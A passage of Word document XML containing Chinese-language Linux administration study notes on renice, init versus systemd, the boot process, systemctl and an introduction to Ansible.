      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程的优先级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF961DF" w14:textId="5BA8A5AC" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>renice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -n -30 17443(pid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D7419" w14:textId="54E10915" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令看到该进程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被更改了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52705AFC" w14:textId="77777777" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538F0DF6" w14:textId="30361977" w:rsidR="0029173D" w:rsidRDefault="00C019F1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务概念介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1612AF" w14:textId="77777777" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9BE7B6" w14:textId="75AC2C21" w:rsidR="0029173D" w:rsidRDefault="00324646" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务就是进程，进程不一定是服务。服务也会受到之前学习的进程的概念。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24A284" w14:textId="77777777" w:rsidR="00324646" w:rsidRDefault="00324646" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269B43C2" w14:textId="46D45E02" w:rsidR="00324646" w:rsidRDefault="00AF322E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的第一个进程，是整个系统的父亲进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C85B344" w14:textId="7D719E66" w:rsidR="0047631B" w:rsidRDefault="0047631B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RHEL</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>版本之前，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RHEL</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，第一个进程叫做</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。第一个进程非常重要，因为第一个进程要负责后面所有其他进程的启动，后面进程的启动决定系统是否可以正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A3C1FF" w14:textId="77777777" w:rsidR="0047631B" w:rsidRDefault="0047631B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A76EC52" w14:textId="14BBB52A" w:rsidR="0047631B" w:rsidRDefault="00DD6CFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有问题，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动的后续进程，都是串行启动的，意味着启动速度慢。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D1D73" w14:textId="77777777" w:rsidR="00DD6CFB" w:rsidRDefault="00DD6CFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6D3EB7" w14:textId="396B6022" w:rsidR="00AF322E" w:rsidRDefault="00DD6CFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RHEL</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的版本，采用第一个进程是</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>相比</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来说，采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD47C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>并行方式</w:t>
      </w:r>
      <w:r w:rsidRPr="007601C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>启动后续进程，意味着启动速度快。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F2851F" w14:textId="77777777" w:rsidR="00DD6CFB" w:rsidRDefault="00DD6CFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F806510" w14:textId="41137088" w:rsidR="00DD6CFB" w:rsidRDefault="004254EB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sys</w:t>
      </w:r>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09352E93" w14:textId="37A4A029" w:rsidR="00324646" w:rsidRDefault="00FD47C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统从启动到提供服务过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460271AA" w14:textId="06172089" w:rsidR="00FD47C8" w:rsidRDefault="00FD47C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>先机器加电，然后通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MBR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UEFI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>GRUB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再启动内核，内核启动服务，然后开始对外服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF2913F" w14:textId="3BB0FDD9" w:rsidR="00FD47C8" w:rsidRDefault="00FD47C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SysV init UpStart systemd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要是解决服务引导管理问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB1259" w14:textId="3B9B96AE" w:rsidR="00FD47C8" w:rsidRPr="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A075E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（此处</w:t>
      </w:r>
      <w:r w:rsidRPr="001A075E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="001A075E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="001A075E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001A075E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，不是字母</w:t>
      </w:r>
      <w:r w:rsidRPr="001A075E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="001A075E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4BC52" w14:textId="74DB98D6" w:rsidR="00FD47C8" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SysV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的优缺点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CCFC31" w14:textId="0784FB3D" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SysV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是最早的解决方案，依靠划分不同的运行级别，启动不同的服务集，服务依靠脚本控制，顺序执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB9FB3" w14:textId="333D24C5" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SysV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方案优点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA3D751" w14:textId="5876FD43" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理简单，易于理解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B4538" w14:textId="0D8B6004" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依靠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本控制，编写服务门槛低</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B5D2E" w14:textId="77777777" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737CD456" w14:textId="5974E64E" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺点：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务顺序启动，启动过程慢</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40743574" w14:textId="0A28FADF" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能根据需要启动服务，比如希望插</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> U</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘，再启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制的服务，可以更好的节省系统资源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDBACB" w14:textId="77777777" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5EA213" w14:textId="3FEE8317" w:rsidR="00324646" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来管理服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED0298A" w14:textId="4024DDA6" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61821ECA" w14:textId="2401A3F2" w:rsidR="001A075E" w:rsidRPr="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>ctl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52382054" w14:textId="77777777" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19EDEA9C" w14:textId="3308FB68" w:rsidR="0029173D" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本上较新版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发行版，都支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理网络服务，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ubuntu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16.04, rhel7 , suse, opensuse, debian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604234A" w14:textId="77777777" w:rsidR="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0019295B" w14:textId="6BF8B2AA" w:rsidR="001A075E" w:rsidRPr="001A075E" w:rsidRDefault="001A075E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A075E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="001A075E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ctl list-units</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DEE55" w14:textId="77777777" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0623763B" w14:textId="77777777" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EC4933" w14:textId="77777777" w:rsidR="008D3CC2" w:rsidRDefault="008D3CC2" w:rsidP="008D3CC2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ansible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C34F8B" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CF73EB" w14:textId="0E3CF089" w:rsidR="00B9708F" w:rsidRDefault="00D97D73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ansible 2.8.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220CA960" w14:textId="02C5431F" w:rsidR="00D97D73" w:rsidRDefault="00D97D73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ansible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个简单的、强大的、无代理的自动化运维工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F631CE5" w14:textId="091204DB" w:rsidR="00D97D73" w:rsidRDefault="00D97D73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ansible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是自动化运维工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A81D5B" w14:textId="77777777" w:rsidR="00D97D73" w:rsidRDefault="00D97D73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B264D4" w14:textId="77777777" w:rsidR="00D97D73" w:rsidRDefault="00D97D73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359EDD75" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA2983D" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB7219F" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9192DA" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BB709D" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDC1273" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBC9054" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF9DC75" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8B2463" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
